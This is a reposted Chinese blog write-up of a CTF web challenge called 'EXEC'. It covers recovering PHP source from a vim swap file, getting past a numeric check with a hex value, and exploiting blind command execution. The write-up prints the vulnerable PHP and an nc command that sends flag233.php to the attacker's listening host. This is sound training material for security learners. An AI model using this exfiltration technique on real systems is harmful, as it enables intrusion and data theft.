i春秋-百度杯十月场-EXEC

最新推荐文章于 2021-10-18 16:43:09 发布
最新推荐文章于 2021-10-18 16:43:09 发布
阅读量196 收藏
点赞数
原文链接:http://www.cnblogs.com/whitehawk/p/9893223.html
版权

进入网站,查看源代码,发现是用vim编辑,而抓包没有有效信息,加参数也无果。百度查了一下vim能形成什么文件。找到答案说,用vim编辑文本xxx.php中途退出,会自动创建一个文件.xxx.php.swp。然后我们下载这个文件。

用 vim -r 命令恢复文件,得到源码:

<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
<?php
/*
flag in flag233.php
*/
function check($number)
{
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == '11259375';
}
if(isset($_GET[sign])&& check($_GET[sign])){
setcookie('auth','tcp tunnel is forbidden!');
if(isset($_POST['cmd'])){
$command=$_POST[cmd];
$result=exec($command);
//echo $result;
}
}else{
die('no sign');
}
?>
</body>
</html>

代码的意思大致是,参数sign必须是11259375,而且每一位的值的ascii码不能大于1或小于9,只能试试16进制了,成功绕过。

但是没有echo,就算命令执行了也没有结果返回,没头绪,参考了下别人的,哈哈。

最后,学到了nc 命令,以前看ctf题都不知道里边的nc是干啥用的,学到了学到了。

服务器上运行,nc -u -l -p 55566

然后,cmd=nc -u ip地址 55566 < flag233.php

转载于:https://www.cnblogs.com/whitehawk/p/9893223.html

weixin_30500663
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
commons-exec-1.3-API文档-中文版.zip
06-05
赠送jar包:commons-exec-1.3.jar; 赠送原API文档:commons-exec-1.3-javadoc.jar; 赠送源代码:commons-exec-1.3-sources.jar; 赠送Maven依赖信息文件:commons-exec-1.3.pom; 包含翻译后的API文档:commons-...
百度CTF比赛 十月-------EXEC
大方子
08-30 2679
=============================== 个人收获 1.命令盲注 2.vim文件泄露 3.nc的使用   ================================   题目:   查看源码出现这个,猜测为vim文件泄露 再浏览器输入.index.php.swp果然出现下载连接   我们把下载来的文件用 vim打开 vim -r ...
i春秋百度”CTF比赛 十月 Exec
include_heqile的博客
10-08 1094
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;r=0 进入题目链接,是一只猫咪 查看网页源代码: &amp;amp;lt;html&amp;amp;gt; &amp;amp;lt;head&amp;amp;gt; &amp;amp;lt;title&amp;amp;gt;blind cmd exec&amp;amp;lt;/title&amp;amp;gt; &
命令执行i春秋
hkk1151043545的博客
10-18 228
标题提示blind cmd exec,意思是命令盲注,第一次遇到,右键查看下源代码 发现了一个editor=‘vim’,这个vim就是linux中的vim命令,得知是vim文件泄漏,百度了一下: 非正常关闭vi/vim编辑器时(比如关机什么的)会产生一个.swp的备份文件已备不测,如果你正常退出,那么这个文件就会被自动删除。使用vim -r (filename)就可以恢复该文件。 那么尝试一下访问.index.php.swp,成功并下载了一个文件,用上面的方法恢复一下 vim -r .index.php
i春秋——“百度”CTF比赛 十月——EXEC(命令执行、带外通道传输数据)...
weixin_30292843的博客
10-14 494
查看源码得知由vim编写,所以查找备份以及交换文件 找到 /.index.php.swp ,下载后用vim -r恢复该文件即可得到源码 1 <html> 2 <head> 3 <title>blind cmd exec</title> 4 <meta language='utf-8' editor='vim'...
[原题复现]百度CTF比赛 十月 WEB EXEC(PHP弱类型)
笑花大王
03-12 673
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
hive-exec-*.jar包
02-27
Missing Hive Execution Jar: /hive/hive1.2.1/lib/hive-exec-*.jar
最新版-zipkin-server-2.23.2-exec.jar.rar
09-02
在给定的文件“最新版-zipkin-server-2.23.2-exec.jar.rar”中,包含的是Zipkin Server的执行版本2.23.2。这个版本的Zipkin Server是一个可执行的JAR文件,用于运行和管理Zipkin服务。 Zipkin的核心功能包括: 1. *...
hive-exec-2.1.1.jar
03-14
hive-exec-2.1.1 是 Apache Hive 的一部分,特别是与 Hive 的执行引擎相关的组件。Apache Hive 是一个构建在 Hadoop 之上的数据仓库基础设施,它允许用户以 SQL(结构化查询语言)的形式查询和管理大型数据集。Hive ...
zipkin-server-2.23.9-exec.jar
07-18
"zipkin-server-2.23.9-exec.jar" 是 Zipkin 服务器的一个可执行 JAR 文件,它包含了运行 Zipkin 服务所需的所有依赖,使得用户可以直接启动这个 JAR 来部署 Zipkin 服务器。 Zipkin 的核心功能包括: 1. **追踪...
zipkin-server-2.12.9-exec.jar
02-24
这里的 "zipkin-server-2.12.9-exec.jar" 文件是 Zipkin 服务器的可执行 JAR 包,版本为 2.12.9。 Zipkin 服务器基于 Java 开发,使用 JAR 文件形式发布,方便用户通过 Java 运行环境快速启动。"exec.jar" 的命名...
hive-exec-3.1.2.jar
06-03
guava-27.0-jre.jar 编译的hive-exec-3.1.2.jar
Maven exec-maven-plugin:执行外部命令的实践指南
最新发布
06-30
exec-maven-plugin是Maven生态系统中的一个插件,它允许用户在Maven构建过程中执行外部命令或脚本。这使得Maven项目可以集成更多的自定义操作,比如运行特定的脚本、调用系统命令等。本文将详细介绍exec-maven-...
exec-maven-plugin:执行Maven插件
02-02
MojoHaus Exec Maven插件 这是 。 发行 确保gpg-agent正在运行。 执行mvn -B release:prepare release:perform 要发布网站,请执行以下操作: cd target/checkout mvn verify site site:stage scm-publish:...
hive-exec-3.1.2 排除guava
03-19
hive-exec-3.1.2 排除guava
2020-12-01
xiaozhuang199652的博客
12-01 1243
1.2.3 十六进制转换成十进制 十六进制:0 1 2 3 4 5 6 7 8 9 A B C D E F 逢十六进一 十六进制转换十进制 7D=7161+13160=125 8F=8161+15160=143 B27CA=11164+2163+7162+12161+10*160=720896+8192+1792+192+10=731082 B42F=11163+4162+2161+15160=45056+1024+32+15=46127 E67A=14163+6162+7161+101
百度CTF比赛 十月-EXEC
r00tnb的博客
07-26 1658
前言 这道题本来要用bash反弹shell的技术的,但是由于没有公网ip的服务器,我就用了命令盲注的方法,特此记录一下。 分析 打开链接题目提示no sign。查看源代码发现这一行 &lt;meta language='utf-8' editor='vim'&gt; 于是就想到了vim信息泄露,于是访问.index.php.swp成功下载了源代码 &lt;html&gt; ...
CmdExec类型作业,运行forfiles命令
ssxw的专栏
07-15 1371
        适用于SQL Server生产环境DBA的七大技巧  ,第一个技巧的实现     删除过期的bak备份文件的另一方法,操作系统cmdExec类型作业,调用forfiles命令实现, 第一步:创建作业     (命令是forfiles语法:可参考http://database.csdn.net/page/27fdc255-6fab-4628-97fd-
Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
热门推荐
yiduyangyi的专栏
04-20 2万+
前言日常java开发中,有时需要通过java运行其它应用功程序,比如shell命令等。jdk的Runtime类提供了这样的方法。首先来看Runtime类的文档, 从文档中可以看出,每个java程序只会有一个Runtime实例,显然这是一个单例模式。/** * Every Java application has a single instance of class * <code>Runtime
docker exec -i和docker exec -it的区别
07-12
`docker exec -i` 和 `docker exec -it` 是用于在运行中的 Docker 容器内执行命令的 Docker CLI 命令。它们之间的区别在于终端交互的方式。 - `docker exec -i`:使用标准输入流(stdin)连接到容器并执行命令,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值